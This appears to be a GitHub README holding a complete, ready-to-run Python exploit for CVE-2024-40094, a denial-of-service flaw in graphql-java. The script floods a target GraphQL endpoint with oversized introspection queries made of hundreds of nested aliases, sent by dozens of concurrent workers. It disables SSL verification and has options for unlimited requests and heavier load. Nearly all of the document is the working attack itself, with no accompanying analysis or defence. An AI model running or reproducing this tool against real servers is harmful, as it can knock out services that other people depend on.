README.md
Rendering markdown...
# CVE-2024-40094 exploit
# ExecutableNormalizedFields (ENF)
import argparse
import asyncio
import logging
import aiohttp
import time
import urllib3
from typing import Dict, Optional
# Disable SSL verification warnings if using self-signed certificates
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
# Default configuration
DEFAULT_URL = "https://api.example.com/graphql"
DEFAULT_HEADERS = {
"Host": "api.example.com",
"Authorization": "Bearer <token>",
"Content-Type": "application/json",
}
# Number of concurrent jobs (similar to threads)
# Each job will be a coroutine
# Use a conservative default to avoid overwhelming the target by accident.
DEFAULT_JOB_COUNT = 50
# Number of repeated alias blocks in the query (depth of stress on the server)
DEFAULT_ALIAS_COUNT = 500
# Delay between requests (in seconds)
DEFAULT_REQUEST_DELAY = 0.0
# Maximum number of requests each job sends (for clean shutdown)
# Set to None for an unlimited number of requests
DEFAULT_MAX_REQUESTS_PER_JOB = 1000
# Optional log file for recording outputs
LOG_FILE = "enf_attack_async.log"
# Logger used by workers
logger = logging.getLogger(__name__)
def build_enf_query(alias_count: int) -> str:
"""
Build a large introspection-based query with repeated aliases
to potentially trigger ENF-based denial of service in vulnerable graphql-java.
We'll nest ~5-7 levels, but you can push it deeper if needed.
"""
nested_block = """
__schema {
types {
name
fields {
name
type {
name
fields {
name
type {
name
fields {
name
}
}
}
}
}
}
}
"""
alias_parts = []
for i in range(1, alias_count + 1):
alias_parts.append(f"alias{i}:{nested_block}")
return f"""
query ENF_Exploit {{
{''.join(alias_parts)}
}}
"""
async def worker(
session: aiohttp.ClientSession,
worker_id: int,
semaphore: asyncio.BoundedSemaphore,
url: str,
alias_count: int,
request_delay: float,
max_requests: Optional[int],
) -> None:
"""
An asynchronous job that sends sequential requests to the server
until it reaches the max_requests limit or the program is stopped.
"""
requests_sent = 0
while True:
# If we have a maximum request limit, stop once it's reached
if max_requests is not None and requests_sent >= max_requests:
logger.info("[Worker-%d] Max requests reached. Stopping...", worker_id)
break
query = build_enf_query(alias_count)
start_time = time.time()
try:
await semaphore.acquire()
try:
# Send the request with the GraphQL query as JSON
async with session.post(url, json={"query": query}, ssl=False) as resp:
status_code = resp.status
text = await resp.text()
length_resp = len(text)
snippet = text[:200].replace("\n", " ")
elapsed = time.time() - start_time
msg = (
f"[Worker-{worker_id}] Status: {status_code}, Len: {length_resp}, "
f"Time: {elapsed:.2f}s, Snippet: {snippet}..."
)
logger.info(msg)
finally:
semaphore.release()
except Exception as e:
logger.exception("[Worker-%d] Error: %s", worker_id, e)
break
requests_sent += 1
if request_delay > 0:
await asyncio.sleep(request_delay)
def configure_logging(log_level: str) -> None:
"""Configure root logger with a file handler and console output."""
level = getattr(logging, log_level.upper(), logging.INFO)
logger.setLevel(level)
formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)s")
file_handler = logging.FileHandler(LOG_FILE)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
async def main(
url: str,
headers: Dict[str, str],
job_count: int,
alias_count: int,
request_delay: float,
max_requests: Optional[int],
log_level: str,
concurrency_limit: int,
) -> None:
"""
Launch all jobs (as coroutines),
then wait for all jobs to complete.
"""
# It's recommended to use a single ClientSession
# for optimized connection pooling
configure_logging(log_level)
semaphore = asyncio.BoundedSemaphore(concurrency_limit)
async with aiohttp.ClientSession(headers=headers) as session:
tasks = []
for i in range(job_count):
tasks.append(
asyncio.create_task(
worker(
session,
i,
semaphore,
url,
alias_count,
request_delay,
max_requests,
)
)
)
# Wait for all tasks to complete
await asyncio.gather(*tasks)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="CVE-2024-40094 exploit")
parser.add_argument("--url", default=DEFAULT_URL, help="Target GraphQL API URL")
parser.add_argument(
"--header",
action="append",
default=[],
help="Additional header in 'Key: Value' format. Can be specified multiple times.",
)
parser.add_argument(
"--job-count",
type=int,
default=DEFAULT_JOB_COUNT,
help="Number of concurrent jobs to spawn.",
)
parser.add_argument(
"--alias-count",
type=int,
default=DEFAULT_ALIAS_COUNT,
help="Number of repeated alias blocks in the query.",
)
parser.add_argument(
"--delay",
type=float,
default=DEFAULT_REQUEST_DELAY,
help="Delay between requests in seconds.",
)
parser.add_argument(
"--max-requests",
type=int,
default=DEFAULT_MAX_REQUESTS_PER_JOB,
help="Maximum number of requests each job sends (0 for unlimited).",
)
parser.add_argument(
"--log-level",
default="INFO",
help="Logging level (e.g., DEBUG, INFO, WARNING, ERROR, CRITICAL)",
)
parser.add_argument(
"--concurrency-limit",
type=int,
help="Maximum number of simultaneous requests allowed; defaults to --job-count.",
)
args = parser.parse_args()
# Build headers from defaults and CLI overrides
headers: Dict[str, str] = dict(DEFAULT_HEADERS)
for header in args.header:
if ":" not in header:
parser.error(f"Invalid header format: {header}")
key, value = header.split(":", 1)
headers[key.strip()] = value.strip()
args.headers = headers
if args.concurrency_limit is None:
args.concurrency_limit = args.job_count
if args.job_count > args.concurrency_limit:
parser.error(
f"--job-count ({args.job_count}) exceeds --concurrency-limit ({args.concurrency_limit})"
)
if args.max_requests == 0:
args.max_requests = None
return args
if __name__ == "__main__":
args = parse_args()
try:
asyncio.run(
main(
args.url,
args.headers,
args.job_count,
args.alias_count,
args.delay,
args.max_requests,
args.log_level,
args.concurrency_limit,
)
)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt received. Shutting down...")